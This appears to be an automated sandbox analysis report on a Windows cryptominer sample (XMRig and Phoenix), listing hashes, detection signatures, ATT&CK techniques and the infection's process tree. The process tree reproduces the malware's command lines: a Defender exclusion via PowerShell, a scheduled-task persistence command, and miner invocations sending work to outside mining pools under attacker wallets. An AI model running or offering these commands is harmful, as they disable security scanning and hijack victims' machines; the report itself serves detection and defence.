xmrig | 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

General

Target

89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
Size

844KB
MD5

64305a05cadf0f450c184acbc40c9f15
SHA1

9c946fce006da78a7a9e2fb22199a381d0d03775
SHA256

89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
SHA512

342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d
SSDEEP

12288:DN43C+LS+Eb4Y/O23Aca/nORmxBcYeiBp:x4S+UJ/CciOReB

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detectes Phoenix Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2012-110-0x0000000140829C40-mapping.dmp	miner_phoenix
behavioral1/memory/2012-113-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/2012-115-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/2012-116-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2040-85-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-87-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-89-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-90-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-92-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-94-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-95-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-97-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-99-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-100-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/2040-102-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-104-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2040-117-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

ULK.exe

pid process

884 ULK.exe

pid	process
884	ULK.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2012-106-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-108-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-109-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-111-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-112-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-113-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-115-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/2012-116-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1972 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

RegSvcs.exe

pid process

2012 RegSvcs.exe
2012 RegSvcs.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

ULK.exe

description pid process target process

PID 884 set thread context of 2040 884 ULK.exe vbc.exe
PID 884 set thread context of 2012 884 ULK.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

392 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

520 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeULK.exe

pid process

2012 powershell.exe
824 powershell.exe
884 ULK.exe
884 ULK.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
1972	cmd.exe

pid	process
2012	RegSvcs.exe
2012	RegSvcs.exe

description	pid	process	target process
PID 884 set thread context of 2040	884	ULK.exe	vbc.exe
PID 884 set thread context of 2012	884	ULK.exe	RegSvcs.exe

pid	process
392	schtasks.exe

pid	process
520	timeout.exe

pid	process
2012	powershell.exe
824	powershell.exe
884	ULK.exe
884	ULK.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exepowershell.exeULK.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	884	ULK.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeLockMemoryPrivilege	2040	vbc.exe
Token: SeLockMemoryPrivilege	2040	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

2040 vbc.exe

pid	process
2040	vbc.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.execmd.exeULK.execmd.exe

description	pid	process	target process
PID 1700 wrote to memory of 2012	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	powershell.exe
PID 1700 wrote to memory of 2012	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	powershell.exe
PID 1700 wrote to memory of 2012	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	powershell.exe
PID 1700 wrote to memory of 1972	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	cmd.exe
PID 1700 wrote to memory of 1972	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	cmd.exe
PID 1700 wrote to memory of 1972	1700	89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe	cmd.exe
PID 1972 wrote to memory of 520	1972	cmd.exe	timeout.exe
PID 1972 wrote to memory of 520	1972	cmd.exe	timeout.exe
PID 1972 wrote to memory of 520	1972	cmd.exe	timeout.exe
PID 1972 wrote to memory of 884	1972	cmd.exe	ULK.exe
PID 1972 wrote to memory of 884	1972	cmd.exe	ULK.exe
PID 1972 wrote to memory of 884	1972	cmd.exe	ULK.exe
PID 884 wrote to memory of 824	884	ULK.exe	powershell.exe
PID 884 wrote to memory of 824	884	ULK.exe	powershell.exe
PID 884 wrote to memory of 824	884	ULK.exe	powershell.exe
PID 884 wrote to memory of 1524	884	ULK.exe	cmd.exe
PID 884 wrote to memory of 1524	884	ULK.exe	cmd.exe
PID 884 wrote to memory of 1524	884	ULK.exe	cmd.exe
PID 1524 wrote to memory of 392	1524	cmd.exe	schtasks.exe
PID 1524 wrote to memory of 392	1524	cmd.exe	schtasks.exe
PID 1524 wrote to memory of 392	1524	cmd.exe	schtasks.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2040	884	ULK.exe	vbc.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe
PID 884 wrote to memory of 2012	884	ULK.exe	RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
"C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF374.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:520

C:\ProgramData\updateWindows\ULK.exe
"C:\ProgramData\updateWindows\ULK.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
5⤵
- Creates scheduled task(s)
PID:392

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 42T9sTTMxUFKM5dzD4Abv21q91YTVw3icZc6NkWGa2psJd8MCPtzXjtWNpjcTYtN9Ri83rPq7dGKBjhn3pyH5vGGG9d5FC7 -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2040

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xAA676adD882a7792EE0d7f3bBf25c045292b5d8e.Rig001 -coin etc -log 0
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\updateWindows\ULK.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\ProgramData\updateWindows\ULK.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF374.tmp.bat
Filesize
145B

MD5
79e7b1fe7bf3f33259ece5179d631d75

SHA1
15e18ee1d8031a293c31dd9f48c060d5a3ed28e2

SHA256
4fd267e039928b4ef385baf0da31c69654510f3d69464d1e3b439925f847ea89

SHA512
40c7fce9f74747ca4c6e3a2d44b590040cfde208f6a213199181f6c05152949b721463feeb3229dba6f08e4ada20e9eedcc305a9c5ed4cd8b4805124b45b14be

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
d198459f0bef5162933b007397e57395

SHA1
1ae885194c6c1f5a1449058b2d4d063ec074b67b

SHA256
6317189d272cba449090f83fec1888f11057f1103cebfd8efa72e43b6c690bee

SHA512
0711aa5b55863afcf13594c706fd2e264a5559a8daeae38d75da6823f376ddd58629a18cf9a93c4d8c44fabfb84adcbb9ff3234bfd1ce7663199df0927389adf

Download Submit
\ProgramData\updateWindows\ULK.exe
Filesize
844KB

MD5
64305a05cadf0f450c184acbc40c9f15

SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775

SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

Download Submit
memory/392-77-0x0000000000000000-mapping.dmp

Download
memory/520-59-0x0000000000000000-mapping.dmp

Download
memory/824-78-0x000007FEEC880000-0x000007FEED3DD000-memory.dmp

Filesize
11.4MB

Download
memory/824-76-0x000007FEED3E0000-0x000007FEEDE03000-memory.dmp

Filesize
10.1MB

Download
memory/824-71-0x0000000000000000-mapping.dmp

Download
memory/824-79-0x0000000002310000-0x0000000002390000-memory.dmp

Filesize
512KB

Download
memory/884-70-0x00000000002E0000-0x00000000003B8000-memory.dmp

Filesize
864KB

Download
memory/884-67-0x0000000000000000-mapping.dmp

Download
memory/1524-75-0x0000000000000000-mapping.dmp

Download
memory/1700-54-0x0000000000AF0000-0x0000000000BC8000-memory.dmp

Filesize
864KB

Download
memory/1972-57-0x0000000000000000-mapping.dmp

Download
memory/2012-61-0x000007FEF3720000-0x000007FEF427D000-memory.dmp

Filesize
11.4MB

Download
memory/2012-115-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-64-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/2012-63-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/2012-105-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-62-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/2012-60-0x000007FEF4280000-0x000007FEF4CA3000-memory.dmp

Filesize
10.1MB

Download
memory/2012-56-0x000007FEFC611000-0x000007FEFC613000-memory.dmp

Filesize
8KB

Download
memory/2012-116-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-65-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/2012-55-0x0000000000000000-mapping.dmp

Download
memory/2012-113-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-112-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-111-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-110-0x0000000140829C40-mapping.dmp

Download
memory/2012-109-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-108-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2012-106-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2040-83-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-99-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-100-0x0000000140343234-mapping.dmp

Download
memory/2040-102-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-103-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2040-104-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-97-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-95-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-94-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-92-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-90-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-89-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-87-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-85-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-114-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2040-81-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-80-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2040-117-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads